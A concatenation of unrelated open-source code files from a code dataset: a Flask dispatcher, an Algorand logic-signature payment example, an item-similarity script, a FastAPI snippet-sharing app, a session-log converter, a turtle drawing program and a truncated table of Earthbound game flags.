from werkzeug.serving import run_simple
from flask import Flask
from api import app as api_app
from frontend import app as frontend_app
from settings import HOSTNAME, PORT, USE_RELOADER, USE_DEBUGGER
application = DispatcherMiddleware(frontend_app, {'/api': api_app})
if __name__ == '__main__':
run_simple(HOSTNAME, PORT, application,
use_reloader=USE_RELOADER, use_debugger=USE_DEBUGGER)
| 1.710938 | 2 |
examples/smart_contracts/v2/python/contract_account.py | TheChronicMonster/docs | 92 | 12796210 | <reponame>TheChronicMonster/docs
from algosdk.v2client import algod
from algosdk.future.transaction import PaymentTxn, LogicSig, LogicSigTransaction
import base64
def wait_for_confirmation(client, txid):
"""
Utility function to wait until the transaction is
confirmed before proceeding.
"""
last_round = client.status().get('last-round')
txinfo = client.pending_transaction_info(txid)
while not (txinfo.get('confirmed-round') and txinfo.get('confirmed-round') > 0):
print("Waiting for confirmation")
last_round += 1
client.status_after_block(last_round)
txinfo = client.pending_transaction_info(txid)
print("Transaction {} confirmed in round {}.".format(
txid, txinfo.get('confirmed-round')))
return txinfo
try:
# Create an algod client
algod_token = "<KEY>"
algod_address = "http://localhost:4001"
receiver = "<receiver_address>"
algod_client = algod.AlgodClient(algod_token, algod_address)
myprogram = "samplearg.teal"
# Read TEAL program
data = open(myprogram, 'r').read()
# Compile TEAL program
# // This code is meant for learning purposes only
# // It should not be used in production
# // samplearg.teal
# arg_0
# btoi
# int 123
# ==
# // bto1
# // Opcode: 0x17
# // Pops: ... stack, []byte
# // Pushes: uint64
# // converts bytes X as big endian to uint64
# // btoi panics if the input is longer than 8 bytes
response = algod_client.compile(data)
# Print(response)
print("Response Result = ", response['result'])
print("Response Hash = ", response['hash'])
# Create logic sig
programstr = response['result']
t = programstr.encode()
program = base64.decodebytes(t)
print(program)
# string parameter
# arg_str = "<my string>"
# arg1 = arg_str.encode()
# lsig = transaction.LogicSig(program, args=[arg1])
# see more info here: https://developer.algorand.org/docs/features/asc1/sdks/#accessing-teal-program-from-sdks
# Create arg to pass if TEAL program requires an arg
# if not, omit args param
arg1 = (123).to_bytes(8, 'big')
lsig = LogicSig(program, args=[arg1])
sender = lsig.address()
# Get suggested parameters
params = algod_client.suggested_params()
# Comment out the next two (2) lines to use suggested fees
params.flat_fee = True
params.fee = 1000
# Build transaction
amount = 10000
closeremainderto = None
# Create a transaction
txn = PaymentTxn(
sender, params, receiver, amount, closeremainderto)
# Create the LogicSigTransaction with contract account LogicSig
lstx = LogicSigTransaction(txn, lsig)
# transaction.write_to_file([lstx], "simple.stxn")
# Send raw LogicSigTransaction to network
txid = algod_client.send_transaction(lstx)
print("Transaction ID: " + txid)
wait_for_confirmation(algod_client, txid)
except Exception as e:
print(e)
| 2.828125 | 3 |
Item2Vec/production/produce_item_sim.py | whz-NJ/PersonalRecommendation | 7 | 12796211 | <reponame>whz-NJ/PersonalRecommendation
#-*-coding:utf8-*-
"""
author:zhiyuan
date:2019
produce item sim file
"""
import os
import numpy as np
import operator
import sys
def load_item_vec(input_file):
"""
Args:
input_file: item vec file
Return:
dict key:itemid value:np.array([num1, num2....])
"""
if not os.path.exists(input_file):
return {}
linenum = 0
item_vec = {}
fp = open(input_file)
for line in fp:
if linenum == 0:
linenum += 1
continue
item = line.strip().split()
if len(item) < 129:
continue
itemid = item[0]
if itemid == "</s>":
continue
item_vec[itemid] = np.array([float(ele) for ele in item[1:]])
fp.close()
return item_vec
def cal_item_sim(item_vec, itemid, output_file):
"""
Args
item_vec:item embedding vector
itemid:fixed itemid to clac item sim
output_file: the file to store result
"""
if itemid not in item_vec:
return
score = {}
topk = 10
fix_item_vec = item_vec[itemid]
for tmp_itemid in item_vec:
if tmp_itemid == itemid:
continue
tmp_itemvec = item_vec[tmp_itemid]
fenmu = np.linalg.norm(fix_item_vec) * np.linalg.norm(tmp_itemvec)
if fenmu == 0:
score[tmp_itemid] = 0
else:
score[tmp_itemid] = round(np.dot(fix_item_vec, tmp_itemvec)/fenmu, 3)
fw = open(output_file, "w+")
out_str = itemid + "\t"
tmp_list = []
for zuhe in sorted(score.iteritems(), key = operator.itemgetter(1), reverse = True)[:topk]:
tmp_list.append(zuhe[0] + "_" + str(zuhe[1]))
out_str += ";".join(tmp_list)
fw.write(out_str + "\n")
fw.close()
def run_main(input_file, output_file):
item_vec = load_item_vec(input_file)
cal_item_sim(item_vec, "27", output_file)
if __name__ == "__main__":
if len(sys.argv) < 3:
print ("usage: python xx.py inputfile outputfile")
sys.exit()
else:
inputfile = sys.argv[1]
outputfile = sys.argv[2]
run_main(inputfile, outputfile)
#run_main("../data/item_vec.txt", "../data/sim_result.txt") | 2.703125 | 3 |
snipz/main.py | deta/programs | 5 | 12796212 | <filename>snipz/main.py
import secrets, string
from deta.lib import App, Database
from fastapi.responses import HTMLResponse
from deta.lib.responses import JSON
from fastapi import FastAPI, Response
from fastapi.middleware.cors import CORSMiddleware
from passlib.context import CryptContext
from pydantic import BaseModel
from jinja2 import Template
# This is a regular FastAPI app. Read the docs of FastAPI:
# https://fastapi.tiangolo.com/
# suggest.html: https://cclwqvx4995d.deta.dev/snippets/chek-0030
# review.html: https://cclwqvx4995d.deta.dev/snippets/pvmh-1775
# main.html: https://cclwqvx4995d.deta.dev/snippets/xrdi-1512
# snipz.css: https://cclwqvx4995d.deta.dev/snippets/hipy-1460
# main.py: https://cclwqvx4995d.deta.dev/snippets/fptk-6045
# README.md: https://cclwqvx4995d.deta.dev/snippets/oulg-9883
fast = FastAPI()
app = App(fast)
snippets = Database("snippets")
pwd_context = CryptContext(schemes=["bcrypt"], deprecated="auto")
def verify_password(plain_password, hashed_password):
return pwd_context.verify(plain_password, hashed_password)
def get_password_hash(password):
return pwd_context.hash(password)
def get_snippet(snip_id):
try:
snippet = snippets.get(snip_id)["data"]
return snippet
except KeyError:
return None
@app.lib.run("snipper")
def snip_handler(event):
key = event.json.get("key")
val = get_snippet(key)
return val
def gen_id():
alpha = "".join(secrets.choice(string.ascii_lowercase) for i in range(4))
digits = "".join(secrets.choice(string.digits) for i in range(4))
key = f"{alpha}-{digits}"
if get_snippet(key):
return gen_id()
return key
def get_change(snippet_id, change_id):
try:
changes = snippets.get(snippet_id)["data"]["proposed_changes"]
change = changes["change_id"]
return change
except KeyError:
return None
def gen_change_id(snippet_id):
alpha = "".join(secrets.choice(string.ascii_lowercase) for i in range(2))
digits = "".join(secrets.choice(string.digits) for i in range(2))
key = f"{alpha}{digits}"
if get_change(snippet_id, f"{alpha}{digits}"):
return gen_change_id()
return key
class Snippet(BaseModel):
name: str
code: str
snip_id: str = gen_id()
proposed_changes: dict = {}
history: list = []
password: str = "<PASSWORD>"
class Password(BaseModel):
password: str
class SnipInDB(Snippet):
hashed_password: str
class Change(BaseModel):
code: str
def authenticate_merge(snip_id: str, password: str):
snippet = get_snippet(snip_id)
if not snippet:
return False
else:
snippet = SnipInDB(**snippet)
if not verify_password(password, snippet.hashed_password):
return False
return True
@app.get("/")
def main_handler():
main = open("main.html").read()
return HTMLResponse(main)
@app.get("/snipz.css")
def main_handler():
css = open("snipz.css").read()
return Response(content=css, media_type="text/css")
@app.post("/create_snippet")
async def make_snippet(new_snip: Snippet):
snip_dict = new_snip.dict()
snip_dict["hashed_password"] = get_password_hash(new_snip.password)
del snip_dict["password"]
snippets.put(new_snip.snip_id, snip_dict)
del snip_dict["hashed_password"]
return Snippet(**snip_dict)
@app.get("/snippets/{snippet_id}")
async def show_snippet(snippet_id: str):
try:
suggest_template = Template((open("suggest.html").read()))
snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
return HTMLResponse(suggest_template.render(snippet_data=snippet))
except KeyError:
return {"error": "no such snippet"}
@app.post("/snippets/{snippet_id}/changes")
async def suggest_change(snippet_id: str, change: Change):
try:
snippet = SnipInDB(**snippets.get(snippet_id)["data"])
snippet.proposed_changes[gen_change_id(snippet_id)] = change.dict()
snippets.put(snippet_id, snippet.dict())
return Snippet(**snippet.dict())
except KeyError:
return {"error": "no such snippet"}
@app.get("/snippets/{snippet_id}/review")
async def review_snippet(snippet_id: str):
try:
review_template = Template((open("review.html").read()))
snippet = Snippet(**snippets.get(snippet_id)["data"]).dict()
return HTMLResponse(review_template.render(snippet_data=snippet))
except KeyError:
return {"error": "no such snippet"}
@app.patch("/snippets/{snippet_id}/merge/{change_id}")
async def merge_change(snippet_id: str, change_id: str, password: Password):
if not authenticate_merge(snippet_id, password.password):
return {"error": "Invalid merge password"}
try:
snippet = SnipInDB(**snippets.get(snippet_id)["data"])
change = Change(**snippet.proposed_changes[change_id])
snippet.history.append(snippet.code)
snippet.code = change.code
del snippet.proposed_changes[change_id]
snippets.put(snippet_id, snippet.dict())
return Snippet(**snippet.dict())
except KeyError:
return {"error": "no such snippet"}
@app.lib.run()
def handler(event):
return len(snippets.all())
@app.lib.run(action="del_snip")
def handler(event):
snip_id = event.json["snip_id"]
snippets.delete(snip_id)
return len(snippets.all()) | 2.234375 | 2 |
v5-unity/codechella-to-codcast/convert.py | ipflsfiles/PyTutor | 17 | 12796213 | <reponame>ipflsfiles/PyTutor
# this script converts a codechella session log recorded by
# ../../v3/opt_togetherjs/server.js
#
# and turns it into the codcast format, which is readable by
# ../js/recorder.ts and ../js/demovideo.ts
#
# writes JSON output to stdout
# created: 2018-05-27
'''
NB: now that i think about it more, it's not entirely clear to me
whether you can always tell who initiated an app.editCode event with any
kind of certainty. oh wells, throw up our hands for nows.
NB: one big challenge is that some types of events are duplicated (or
repeated N times if there are N people in the session) since TogetherJS
logs everyone's actions separately
- app.editCode events are DEFINITELY duplicated
- app.hashchange events might also be duplicated
- maybe ONLY take hashchange events for YOURSELF?
HUGE WARNING: DO NOT RUN THIS ON UNTRUSTED CODE YET, SINCE IT WILL
SIMPLY EXECUTE THE CODE VERBATIM TO GENERATE TRACES FOR THE CACHE; IF
THE CODE IS MALICIOUS, THEN IT WILL POSSIBLY HARM YOUR COMPUTER!!!
- the solution to this is to run the code on the actual server to
generate a real trace for the trace cache; we need to essentially
create a python-based driver (maybe using requests) to make the
proper calls to the various OPT backends, depending on language
TODOs:
- not sure how much hashchange events matter
- maybe we can use app.executeCode events as 'sync points' since we know
that the code in the editor contains those contents when they execute
'''
from collections import defaultdict
import dateutil.parser
import json
import os
import sys
import time
from call_opt_backend import call_opt_backend
# somewhat modeled after ../js/demovideo.ts
ALL_LEGIT_TYPES = (
'app.initialAppState',
'hello',
'peer-update',
'form-update',
'cursor-update',
'chat',
'app.editCode',
'app.executeCode',
'app.updateOutput',
'app.aceChangeCursor',
'app.aceChangeSelection',
'pyCodeOutputDivScroll',
'app.hashchange',
)
# TODO: maybe we don't need this since TogetherJS will take care of
# mapping clientId's to usernames for us ...
#
# Key: clientId, Value: current username (might change throughout the
# session; keep the latest one)
clientIdtoUsername = {}
firstInitialAppState = None
firstClientId = None
raw_events = []
# Key: delta 'd' field, value: list of code edit events with that same 'd'
#
# NB: this won't be fully accurate if there are several *independent*
# sets of edits occurring at vastly different times which have the same 'd'
all_code_edits_by_deltas = defaultdict(list)
for line in open(sys.argv[1]):
rec = json.loads(line)
if rec['type'] != 'togetherjs':
continue
tjs = rec['togetherjs']
typ = tjs['type']
if typ not in ALL_LEGIT_TYPES:
continue
# read only the FIRST initialAppState since we'll assume that's who
# initiated the session
if not firstInitialAppState and typ == 'app.initialAppState':
firstInitialAppState = rec
firstClientId = tjs['clientId']
# don't append any initialAppState events:
if typ == 'app.initialAppState':
continue
if typ == 'app.editCode':
all_code_edits_by_deltas[tjs['delta']['d']].append(tjs)
# it's really tricky to log editCode events since they often appear as
# duplicates (or even more copies if there are more people in the session).
# the easiest way to manage it is to record only editCode events belonging
# to the firstClientId user and discard all other ones.
if typ == 'app.editCode' and firstClientId and tjs['clientId'] != firstClientId:
continue
# ...do the same with hashchange: log them only for the firstClientId user
if typ == 'hashchange' and firstClientId and tjs['clientId'] != firstClientId:
continue
raw_events.append(rec)
# if tjs['delta']['d'] == lastEditCodeEvent['togetherjs']['delta']['d']:
# assert tjs['delta']['t'] >= lastEditCodeEvent['togetherjs']['delta']['t']
# continue # get outta here!
events = []
for e in raw_events:
tjs = e['togetherjs']
# clean up and append to final events
dt = dateutil.parser.parse(e['date'])
# get timestamp in milliseconds
ms = int(time.mktime(dt.timetuple())) * 1000
# for app.codeEdit events, look up who the ORIGINAL PERSON was who
# initiated this edit event, and log their clientId, which may be
# different than your own clientId
if tjs['type'] == 'app.editCode':
d = tjs['delta']['d']
t = tjs['delta']['t']
assert d in all_code_edits_by_deltas
firstEdit = all_code_edits_by_deltas[d][0]
firstEditTimestamp = firstEdit['delta']['t']
# sanity check: note that this will fail if we have multiple
# identical sets of edits that take place at vastly
# different points in time, but let's cross that bridge when
# we get to it
assert firstEditTimestamp <= t
assert t - firstEditTimestamp < 5000 # give it a 5-second buffer for sanity checking
tjs['clientId'] = firstEdit['clientId'] # change the clientId for this event!
# add these fields to match codcast format
tjs['ts'] = ms
tjs['sameUrl'] = True
tjs['peer'] = {'color': '#8d549f'} # not sure if this is necessary
# TODO: we need to add frameNum field later on; or maybe just add it here?!?
events.append(tjs)
# each element of myTraceCache is a pair of [appState, cached trace from server]
myTraceCache = []
for e in events:
if e['type'] == 'app.executeCode':
myAppState = e['myAppState']
r = call_opt_backend(myAppState)
#print r.url
serverResultJson = r.json()
if 'trace' in serverResultJson:
myTrace = serverResultJson['trace']
myTraceCache.append([myAppState, myTrace])
else:
print >> sys.stderr, "ERROR while running", myAppState, '->', serverResultJson
initialAppState = firstInitialAppState['togetherjs']['myAppState']
initialAppState['clientId'] = firstInitialAppState['togetherjs']['clientId'] # augment it
firstDt = dateutil.parser.parse(firstInitialAppState['date'])
firstTs = int(time.mktime(firstDt.timetuple())) * 1000 # milliseconds
# prepend a special app.startRecordingDemo event to events
startRecordingDemoEvent = {'type': 'app.startRecordingDemo',
'clientId': firstInitialAppState['togetherjs']['clientId'],
'ts': firstTs,
'sameUrl': True,
'peer': {'color': '#8d549f'}} # not sure if this is necessary
events.insert(0, startRecordingDemoEvent)
# ok finally produce the codcast object and write it out to stdout as JSON
codcastObj = {'initialAppState': initialAppState,
'events': events,
'traceCache': myTraceCache}
print json.dumps(codcastObj)
| 1.84375 | 2 |
11_20/day-19/etch-a-sketch.py | srakhe/100-days-py | 0 | 12796214 | from turtle import Turtle, Screen
my_turtle = Turtle()
screen = Screen()
my_turtle.shape('arrow')
def forward():
my_turtle.forward(10)
def backward():
my_turtle.back(10)
def right():
my_turtle.right(10)
def left():
my_turtle.left(10)
def clear_screen():
my_turtle.penup()
my_turtle.home()
my_turtle.clear()
my_turtle.pendown()
screen.listen()
screen.onkeypress(forward, 'w')
screen.onkeypress(backward, 's')
screen.onkeypress(right, 'd')
screen.onkeypress(left, 'a')
screen.onkeypress(clear_screen, 'c')
screen.exitonclick()
| 3.546875 | 4 |
constants/flags.py | CataLatas/earthbound-script-dumper | 2 | 12796215 | # Flag names for MOTHER2/Earthbound
# Luckily, every version uses the same flag IDs
FLAG_NAMES = {
1: 'TEMP_1',
2: 'TEMP_2',
3: 'TEMP_3',
4: 'TEMP_4',
5: 'TEMP_5',
6: 'TEMP_6',
7: 'TEMP_7',
8: 'TEMP_8',
9: 'TEMP_9',
10: 'TEMP_10',
11: 'ENEMY_SUPPRESS',
12: 'PAULAS_PARENTS_KNOW_ABOUT_HH_RESCUE',
13: 'PAULA_JOINS',
14: 'JEFF_JOINS',
15: 'MONSTERS_IN_WINTERS',
16: 'POO_JOINS',
17: 'POO_LEARNING_STARSTORM',
18: 'BUZZ_BUZZ_IN_PARTY',
19: 'SLEEPING_KING_ABSENT',
20: 'PICKY_IN_PARTY',
21: 'POKEY_IN_PARTY',
22: 'BUBBLE_MONKEY_IN_PARTY',
23: 'TONY_JOINS',
24: 'DUNGEON_MAN_JOINS',
25: 'FLYING_MAN_1_JOINS',
26: 'FLYING_MAN_2_JOINS',
27: 'FLYING_MAN_3_JOINS',
28: 'FLYING_MAN_4_JOINS',
29: 'FLYING_MAN_5_JOINS',
30: 'POKEY_JOINS',
31: 'LIER_INSIDE_HOUSE',
32: 'LIER_INSIDE_CAVE_1',
33: 'LIER_INSIDE_CAVE_2',
34: 'PICKY_AT_HIS_ROOM',
35: 'POKEY_AT_HIS_ROOM',
36: 'COP_AT_ENTERTAINERS_SHACK',
37: 'ALOYSIUS_AT_HOME',
38: 'FIVE_COPS_AT_POLICE_STATION',
39: 'COP_AT_STATION_ENTRANCE',
40: 'SHARK_GUARDING_FRANK_DEFEATED',
41: 'CHAOS_THEATER_STAGE_UNBLOCKED',
42: 'APPLE_KID_IN_BURGLIN_PARK',
43: 'RUNAWAY_FIVE_FAN_GIRL_OUTSIDE_BACKSTAGE',
44: 'POKEY_OUTSIDE_HH_HQ',
45: 'POKEY_OUTSIDE_PAULA_CABIN',
46: 'ZOMBIE_CHICK_OUTSIDE_HOTEL',
47: 'BROKEN_SKYRUNNER_THREED',
48: 'FIXED_SKYRUNNER_THREED',
49: 'BOOGEY_TENT_IN_THREED',
50: 'BRICK_ROAD_OUTSIDE_DUNGEON',
51: 'SHYNESS_BOOK_AT_LIBRARY',
52: 'CAPTIVES_AT_STONEHENGE',
53: 'TALKED_TO_BRICK_ROAD',
# 54 (Montague at beginning of expanded mine?)
# 55 (Also related to Montague... AND STONEHENGE??)
# 56 (Unknown)
57: 'FOURSIDE_DEPT_BLACKOUT',
58: 'FOURSIDE_SEWERS_OPEN',
59: 'ELECTRA_OUTSIDE_BUILDING',
60: 'EVERDRED_OUTSIDE_CAFE',
61: 'MAGIC_CAKE_LADY_IDENTIFIED',
62: 'DUNGEON_MAN_IN_DESERT',
63: 'PATH_TO_MANI_MANI_OPEN',
64: 'FRANKYSTEIN_MKII_DEFEATED',
# 65 (???)
66: 'EVERDRED_DEFEATED',
67: 'FOOD_STAND_MONITOR_DEFEATED',
68: 'CARPAINTER_DEFEATED',
69: 'BOOGEY_TENT_DEFEATED',
70: 'STARMAN_DX_DEFEATED',
71: 'MASTER_BELCH_DEFEATED',
72: 'MINE_MOLES_DEFEATED',
73: 'GIYGAS_DEFEATED',
74: 'NESS_NIGHTMARE_DEFEATED',
75: 'MANI_MANI_DEFEATED',
76: 'GOT_TRACY_COOKIE',
77: 'GOT_MR_BASEBALL_CAP',
78: 'GOT_ENTERTAINERS_TRAVEL_CHARM',
79: 'GOT_METEORITE_PIECE',
80: 'GOT_KEY_TO_SHACK',
81: 'HAS_BICYCLE',
82: 'GOT_RECEIVER_PHONE',
83: 'GOT_PENCIL_ERASER',
84: 'GOT_HAND_AID',
85: 'GOT_WAD_OF_BILLS',
86: 'GOT_FRANKLIN_BADGE',
87: 'GOT_FLY_HONEY',
88: 'GOT_BAD_KEY_MACHINE',
89: 'GOT_SHYNESS_BOOK',
90: 'GOT_DIAMOND',
91: 'GOT_SIGNED_BANANA',
92: 'GOT_TENDA_DRAGONITE',
93: 'GOT_MAGICANT_BASEBALL_CAP',
94: 'MOM_ADVICE_TO_TAKE_CRACKED_BAT',
95: 'DAD_CALLING_HOME',
96: 'POKEY_WAITING_MOM_GOODBYE',
97: 'NESS_HOUSE_POKEY_MUSIC',
98: 'ANSWERED_DADS_CALL',
99: 'BOUGHT_SCAM_HOUSE',
100: 'KING_WONT_JOIN',
101: 'LEARNED_THAT_LIER_SOLD_THE_MANI_MANI',
102: 'TALKED_TO_SHYGUY_ABOUT_SHYNESS_BOOK',
103: 'LIBRARY_BATHROOM_MAN', # Referenced in unused text
104: 'POKEY_PUNISHED',
105: 'PATH_TO_TWOSON_OPEN',
# 106 (???)
107: 'ONETT_SUNRISE',
108: 'ENTERTAINERS_SHACK_UNLOCKED',
109: 'ONETT_COP_DIALOGUE',
# 110 (???)
111: 'VISITED_PEACEFUL_REST_PENCIL',
112: 'INVESTED_IN_APPLE_KID',
113: 'STUBBY_LEGS',
114: 'TWOSON_DEPT_MAN',
115: 'CHAOS_THEATER_BACKSTAGE_OPEN',
116: 'ORANGE_KID_ALT_TEXT',
117: 'INVESTED_IN_ORANGE_KID',
118: 'PAULAS_DAD_OUTSIDE',
119: 'RUNAWAY_FIVE_FREE_FROM_CHAOS_THEATER',
120: 'SHOPPED_AT_FOOD_STAND',
121: 'DID_NOT_PAY_FOOD_STAND',
122: 'CARPAINTER_HAS_KEY',
123: 'BLUE_COW_ALT_TEXT',
124: 'ZOMBIE_PAPER_ON_TENT',
125: 'ZOMBIES_ON_TENT_FLOOR',
126: 'LEARNED_ABOUT_SHYNESS_BOOK', # TODO: Maybe "can search for shyness book"? This flag is set even if you don't talk to Apple Kid
127: 'TALKED_TO_ANDONUTS_1',
128: 'JEFF_STARTS_HIS_JOURNEY',
129: 'TESSIE_EMERGES',
130: 'TALKED_TO_ANDONUTS_2',
131: 'WATERFALL_WAIT_ENABLED',
132: 'QUEST_TO_ZEXONYTE',
133: 'PHASE_DISTORTER_V2_OPEN',
134: 'DELIVERED_ZEXONYTE',
135: 'TALKED_TO_BLACK_SESAME_SEED',
136: 'TRAFFIC_JAM_CLEARED',
137: 'GAVE_FOOD_TO_MONTAGUE',
138: 'TALKED_TO_WHITE_SESAME_SEED',
139: 'DEPT_STORE_SPOOK_DEFEATED', # TODO: Confirm
140: 'QUEST_TO_VENUS_AUTOGRAPH',
141: 'GOT_TROUT_YOGURT',
142: 'CAN_ACCESS_48TH_MONOTILI_FLOOR',
143: 'FOURSIDE_FREE_FROM_MONOTOLI',
# 144 (Related to Bulldozer at Fourside Bridge?)
145: 'TALKED_TO_DYING_EVERDRED',
146: 'RUNAWAY_FIVE_FREE_FROM_TOPOLLA_THEATER',
# 147 (Venus at Topolla?)
148: 'READ_HIEROGLYPHS',
149: 'POO_STARTS_HIS_JOURNEY',
# 150 (Related to Poo's journey)
151: 'QUEST_TO_SUBMARINE',
152: 'PYRAMID_DANCE_IN_PROGRESS',
153: 'TENDA_VILLAGE_UNDERGROUND_OPEN',
154: 'TALKED_TO_TENDA_CHIEF',
155: 'TENDAS_NOT_SHY',
# 156 (???)
# 157 (???)
# 158 (???)
159: 'CHECKED_LAST_FLYING_MAN_TOMBSTONE',
# 160 (???)
# 161 (???)
# 162 (???)
# 163 (???)
# 164 (???)
165: 'INVISIBLE_MAN_JOINS',
166: 'MOONSIDE_COUNTDOWN_GUY_1',
167: 'MOONSIDE_COUNTDOWN_GUY_2',
168: 'MOONSIDE_COUNTDOWN_GUY_3',
169: 'PHASE_DISTORTER_V2_BEING_FINISHED',
# 170 (???)
171: 'GOT_SATURN_LIFENOODLES',
172: 'GOT_SATURN_COIN',
173: 'GOT_SATURN_STAG_BEETLE',
174: 'DESERT_MINE_EXPANDED',
# 175 (Unknown. Set when you receive the Pencil Eraser. Cleared when you defeat Mr. Carpainter)
176: 'HEALER_SOFTEN',
177: 'HEALER_PURIFY',
178: 'HEALER_RESTORE_FEELING',
179: 'LARGE_PIZZA_DELIVERY',
180: 'PIZZA_DELIVERY',
181: 'ESCARGO_EXPRESS_DELIVERY',
182: 'GOT_MELODY_GIANT_STEP',
183: 'GOT_MELODY_LILLIPUT_STEPS',
184: 'GOT_MELODY_RAINY_CIRCLE',
185: 'GOT_MELODY_MILKY_WELL',
186: 'GOT_MELODY_MAGNET_HILL',
187: 'GOT_MELODY_PINK_CLOUD',
188: 'GOT_MELODY_LUMINE_HALL',
189: 'GOT_MELODY_FIRE_SPRING',
190: 'CONQUERED_SANCTUARY_1',
191: 'CONQUERED_SANCTUARY_2',
192: 'CONQUERED_SANCTUARY_4',
193: 'CONQUERED_SANCTUARY_3',
194: 'CONQUERED_SANCTUARY_5',
195: 'CONQUERED_SANCTUARY_6',
196: 'CONQUERED_SANCTUARY_7',
197: 'CONQUERED_SANCTUARY_8',
# 198 (Unknown. Set when Paula joins)
199: 'GOT_DAD_PHONE',
200: 'GOT_MOM_PHONE',
201: 'GOT_ESCARGO_EXPRESS_PHONE',
202: 'GOT_MACH_PIZZA_PHONE',
203: 'GOT_STOIC_CLUB_PHONE',
204: 'FLYING_MAN_1_DEAD',
205: 'FLYING_MAN_2_DEAD',
206: 'FLYING_MAN_3_DEAD',
207: 'FLYING_MAN_4_DEAD',
208: 'FLYING_MAN_5_DEAD',
209: 'VISITED_ONETT',
210: 'VISITED_TWOSON',
211: 'VISITED_THREED',
212: 'VISITED_WINTERS',
213: 'VISITED_SATURN_VALLEY',
214: 'VISITED_FOURSIDE',
215: 'VISITED_SUMMERS',
216: 'VISITED_DALAAM',
217: 'VISITED_SCARABA',
218: 'VISITED_DEEP_DARKNESS',
219: 'VISITED_TENDA_VILLAGE',
220: 'VISITED_UNDERWORLD',
221: 'UNUSED_BRAIN_FOOD_LUNCH',
222: 'UNUSED_REFRESHING_HERB',
223: 'GOT_PHASE_DISTORTER_HORN_OF_LIFE',
224: 'SHOP_SOLD_OLD_EQUIPMENT',
225: 'SHOP_SOLD_ITEM',
# 226 (I hate multipurpose flags)
# 227 (I hate multipurpose flags)
# 228 (I hate multipurpose flags)
# 229 (I hate multipurpose flags)
# 230 (I hate multipurpose flags)
# 231 (I hate multipurpose flags)
# 232 (I hate multipurpose flags)
# 233 (I hate multipurpose flags)
234: 'SHOP_TWOSON_DEPT_3RD_FLOOR_WOMAN',
235: 'SHOP_BURGLIN_PARK_JAMAICAN',
236: 'SHOP_BURGLIN_PARK_BAKERY',
237: 'SHOP_BURGLIN_PARK_CONDIMENTS',
238: 'SHOP_BURGLIN_PARK_BANANA_LADY',
239: 'SHOP_HH_DRUGSTORE_CONSUMABLES',
240: 'SHOP_HH_DRUGSTORE_EQUIPMENT',
241: 'SHOP_THREED_DRUGSTORE_EQUIPMENT',
242: 'SHOP_THREED_DRUGSTORE_CONSUMABLES',
243: 'SHOP_THREED_ARMS_DEALER',
244: 'SHOP_THREED_BAKERY',
245: 'SHOP_WINTERS_DRUGSTORE',
246: 'SHOP_LAB_CAVE_BOY',
247: 'SHOP_GRAPEFRUIT_FALLS',
248: 'SHOP_SATURN_EQUIPMENT',
249: 'SHOP_SATURN_PENDANTS',
250: 'SHOP_SATURN_CONSUMABLES',
251: 'SHOP_DESERT_DRUGSTORE_EQUIPMENT',
252: 'SHOP_DESERT_DRUGSTORE_CONSUMABLES',
253: 'SHOP_DESERT_MINE',
254: 'SHOP_DESERT_ARMS_DEALER',
255: 'SHOP_FOURSIDE_BAKERY',
256: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_EQUIPMENT',
257: 'SHOP_FOURSIDE_DEPT_3RD_FLOOR_CONSUMABLES',
258: 'SHOP_FOURSIDE_DEPT_BAKERY',
259: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_TOYS',
260: 'SHOP_FOURSIDE_DEPT_4TH_FLOOR_SPORTS',
261: 'SHOP_FOURSIDE_DEPT_BURGER',
262: 'SHOP_FOURSIDE_DEPT_CONDIMENTS',
263: 'SHOP_FOURSIDE_DEPT_ARMS_DEALER',
264: 'SHOP_FOURSIDE_PUNK_GUY',
265: 'SHOP_SUMMERS_SHOP',
266: 'SHOP_SUMMERS_RESTAURANT',
267: 'SHOP_TOTO_SHOP',
268: 'SHOP_SUMMERS_GELATO',
269: 'SHOP_MAGIC_CAKE_LADY',
270: 'SHOP_DALAAM_RESTAURANT',
271: 'SHOP_SCARABA_HASSANS_SHOP',
272: 'DIAMOND_TO_BE_DELIVERED',
273: 'MU_TRAINING_COMPLETE',
274: 'DUNGEON_MAN_AT_PALM_TREES',
275: 'LEARNED_TELEPORT',
276: 'MASTER_BARF_DEFEATED',
277: 'GUARDIAN_MOLE_1_DEFEATED',
278: 'GUARDIAN_MOLE_2_DEFEATED',
279: 'GUARDIAN_MOLE_3_DEFEATED',
280: 'GUARDIAN_MOLE_4_DEFEATED',
281: 'GUARDIAN_MOLE_5_DEFEATED',
# 282 (Five moles defeated? How does this differ from 72?)
# 283 (???)
284: 'PEACEFUL_REST_PENCIL_ERASED',
285: 'TALKED_TO_APPLE_KID_CAVE_OF_THE_PRESENT',
# 286 (???)
# 287 (Something about Lake Tess color palette)
288: 'USED_HAWK_EYE',
289: 'ONETT_COP_1_DEFEATED',
290: 'ONETT_COP_2_DEFEATED',
291: 'ONETT_COP_3_DEFEATED',
292: 'ONETT_COP_4_DEFEATED',
293: 'ONETT_COP_5_DEFEATED',
294: 'APPLE_MOUSE_BLOCKING_DOOR',
295: 'NESS_HOUSE_DOOR_KNOCKING',
296: 'ZOMBIE_CHICK_AT_HOTEL_1', # First hotel room
297: 'ZOMBIE_CHICK_AT_HOTEL_2', # Second hotel room
298: 'ZOMBIE_CHICK_AT_HOTEL_3', # Third hotel room
299: 'IRON_ERASER_ERASED',
300: 'ZOMBIE_GUARDS_AWAY',
301: 'POKEY_WAITING_AT_DOOR',
# 302 (???)
303: 'BUZZ_BUZZ_DYING_ON_FLOOR',
304: 'KING_AWAKE_AT_HOME',
# 305 (???)
306: 'LIER_INSIDE_CAVE_3',
307: 'LIER_INSIDE_CAVE_4',
308: 'LIER_BY_MANI_MANI',
309: 'RUNAWAY_BUS_FROM_TWOSON_TO_THREED',
310: 'POKEY_WAITING_AT_COUCH',
311: 'WINTERS_ROPE_LOWERED',
312: 'GHOSTS_BLOCKING_THREED',
# 313 (Unknown. Something about the City Bus?)
# 314 (Unknown. Something about the Runaway Five Bus?)
315: 'GHOSTS_BLOCKING_TWOSON',
# 316 (Unknown. Something about the City Bus?)
317: 'RUNAWAY_BUS_FROM_FOURSIDE_TO_THREED',
318: 'RUNAWAY_FIVE_AT_CLUMSY_ROBOT_ROOM',
319: 'WATCHED_RUNAWAY_FIVE_AT_CHAOS_THEATER',
# 320 (???)
# 321 (Something about Paula's Dad acknowledging the kidnapping)
322: 'PAULAS_DAD_NOTICED_SHES_NOT_HOME',
323: 'GOT_PAK_OF_BUBBLE_GUM',
